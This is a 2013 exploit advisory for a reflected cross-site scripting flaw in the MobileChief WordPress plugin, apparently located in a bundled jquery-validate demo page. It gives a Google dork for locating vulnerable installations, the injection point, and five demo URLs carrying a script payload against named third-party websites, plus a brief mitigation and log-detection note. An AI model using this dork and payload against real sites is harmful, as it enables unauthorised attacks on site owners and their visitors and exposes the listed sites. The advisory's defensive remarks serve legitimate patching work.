====================================================================
# Exploit Title : WordPress MobileChief - Mobile Site Builder plugin Cross-Site Scripting (XSS)
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://wordpress.org
# Plugin Link : http://downloads.wordpress.org/plugin/mobilechief-mobile-site-creator.1.5.7.zip
# Version : 1.5.7
# Google Dork : inurl:wp-content/plugins/mobilechief-mobile-site-creator
# Date: 2013/10/26
# Tested on: Windows 7
# ------------------------------------------------
#
# Exploit :
#
# Location : http://site.com/wp-content/plugins/mobilechief-mobile-site-creator/lib/jquery-validate/demo/captcha/index.php/[xss]
#
# Script For Test : "/>
#   (the remainder of the test string was stripped as markup when this page was extracted; the Demo URLs below carry it URL-encoded)
#
# Note : the injected text is the extra path segment that follows index.php, and the affected file sits under
#   lib/jquery-validate/demo/, so this appears to be a reflected XSS in a demo page of the bundled jquery-validate
#   library rather than in the plugin's own code. The advisory names no fixed version; removing the demo/ directory
#   from the installed plugin, or denying web access to it, takes the affected page out of reach. In access logs the
#   issue shows up as requests whose path continues past captcha/index.php with encoded quote or angle-bracket characters.
# ------------------------------------------------
#
# Demo:
#
# http://aactionhomeservices.net/wp-content/plugins/mobilechief-mobile-site-creator/lib/jquery-validate/demo/captcha/index.php/%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
# http://www.bsusos.com/main/wp-content/plugins/mobilechief-mobile-site-creator/lib/jquery-validate/demo/captcha/index.php/%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
# http://www.happyrecyclers.com/wp-content/plugins/mobilechief-mobile-site-creator/lib/jquery-validate/demo/captcha/index.php/%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
# http://www.floridanpalace.com/wp-content/plugins/mobilechief-mobile-site-creator/lib/jquery-validate/demo/captcha/index.php/%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
# http://www.bnhre.net/wp-content/plugins/mobilechief-mobile-site-creator/lib/jquery-validate/demo/captcha/index.php/%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
###################### discovered by : ACC3SS ######################